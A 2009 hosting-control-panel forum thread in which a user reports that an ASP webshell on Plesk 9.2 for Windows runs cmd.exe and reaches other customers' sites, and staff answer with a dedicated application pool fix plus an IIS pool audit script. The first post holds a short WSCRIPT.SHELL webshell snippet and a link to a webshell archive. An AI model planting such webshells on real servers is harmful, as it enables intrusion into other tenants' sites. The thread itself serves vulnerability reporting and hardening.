
Server Plesk 9.2 Hacked

Discussion in 'Plesk 9.x for Windows Issue, Fixes, How-To' started by Nguyen Thang Long, Dec 24, 2009.

  1. Nguyen Thang Long

    Nguyen Thang Long Guest

    0
     
    I am testing Plesk 9.2 on Windows Server 2003.
    I tried to hack this server with a webshell (aspx & asp).
    Example:
    When I ran:
    <%@ Language=VBScript %>
    <%
    On Error Resume Next
    Dim oScript
    Dim gURL
    gURL = Request.ServerVariables("APPL_PHYSICAL_PATH")
    Set oScript = Server.CreateObject("WSCRIPT.SHELL")
    Call oScript.Run ("c:\\WINDOWS\\system32\\cmd.exe",1,True)
    %>

    Then the task manager of the server showed cmd.exe running as the user: IWAM_Plesk(Default)
    Or when I used a webshell (http://www.guru.net.vn/kshell_1.2.zip), I could hack the websites of other users on this server.
    I used the Plesk tools to make sure of the server's permissions, but that does not fix the problem.

    I can't fix it. Who can secure this and fix that error? Help me?

    Thanks so much !
     
  2. IgorG

    IgorG Forums Analyst Staff Member

    49
    24%
    Joined:
    Oct 27, 2009
    Messages:
    24,572
    Likes Received:
    1,243
    Location:
    Novosibirsk, Russia
    I have reported this problem to the developers with high priority. I will update this thread with the results as soon as I receive them.
     
  3. Nguyen Thang Long

    Nguyen Thang Long Guest

    Thanks to IgorG :)
     
  4. deepa

    deepa Basic Pleskian

    26
     
    Joined:
    Dec 26, 2005
    Messages:
    72
    Likes Received:
    0
    Is this a security bug in Plesk 9.2?
     
  5. IgorG

    IgorG Forums Analyst Staff Member

    The problem is still under the developers' investigation. I will update the thread as soon as I receive any useful information.
     
  6. IgorG

    IgorG Forums Analyst Staff Member

    This issue is caused by the fact that, by default, all users' applications work inside a single AppPool. So they probably have access to each other's content.

    This issue can be resolved if you set <domain> -> Web Hosting Settings -> 'Use dedicated pool' on every domain (you can also use mass domain operations). Additionally, you can set the Home -> IIS Application Pool -> Global Settings -> 'Always place all domains in the shared application pool' option. It will run each site in a separate pool, and their applications will not be able to read each other.
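
A way to check the result of the change described in the last reply, as an added example that is not part of the original thread or of Plesk itself: the script lists every IIS application pool, the identity it runs as, and the sites placed in it, and flags pools shared by more than one site. It assumes IIS 7 or later with the WebAdministration module, not IIS 6 on the Windows Server 2003 host from the first post; the output column names are chosen here for illustration.

```powershell
# Added example (not from the thread): find IIS application pools shared by several sites.
# Assumption: IIS 7+ with the WebAdministration module; run from an elevated prompt.
Import-Module WebAdministration

# Build one record per application: the root application of each site
# plus any nested applications, each with the pool it is assigned to.
$apps = foreach ($site in Get-Website) {
    New-Object psobject -Property @{
        Site = $site.Name; Path = '/'; Pool = $site.applicationPool
    }
    foreach ($app in Get-WebApplication -Site $site.Name) {
        New-Object psobject -Property @{
            Site = $site.Name; Path = $app.path; Pool = $app.applicationPool
        }
    }
}

# Group by pool. A pool that serves more than one site means those sites'
# code runs in the same worker process under the same Windows identity.
$report = $apps | Group-Object Pool | ForEach-Object {
    $sites = @($_.Group | ForEach-Object { $_.Site } | Sort-Object -Unique)
    $pm    = Get-ItemProperty "IIS:\AppPools\$($_.Name)" -Name processModel

    # Show the account name only when the pool runs as a specific user;
    # otherwise show the built-in identity type.
    $identity = if ($pm.identityType -eq 'SpecificUser') { $pm.userName }
                else { $pm.identityType }

    New-Object psobject -Property @{
        Pool      = $_.Name
        Identity  = $identity
        SiteCount = $sites.Count
        Shared    = ($sites.Count -gt 1)
        Sites     = ($sites -join ', ')
    }
}

# Shared pools first; these are the ones to move to a dedicated pool.
$report | Sort-Object SiteCount -Descending |
    Format-Table Pool, Identity, SiteCount, Shared, Sites -AutoSize

# Summary line for quick use in a scheduled check.
$shared = @($report | Where-Object { $_.Shared })
"{0} of {1} pools are shared between sites" -f $shared.Count, @($report).Count
```

After every domain has been moved to a dedicated pool, each customer site should appear alone in its pool with `Shared` set to `False`.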
     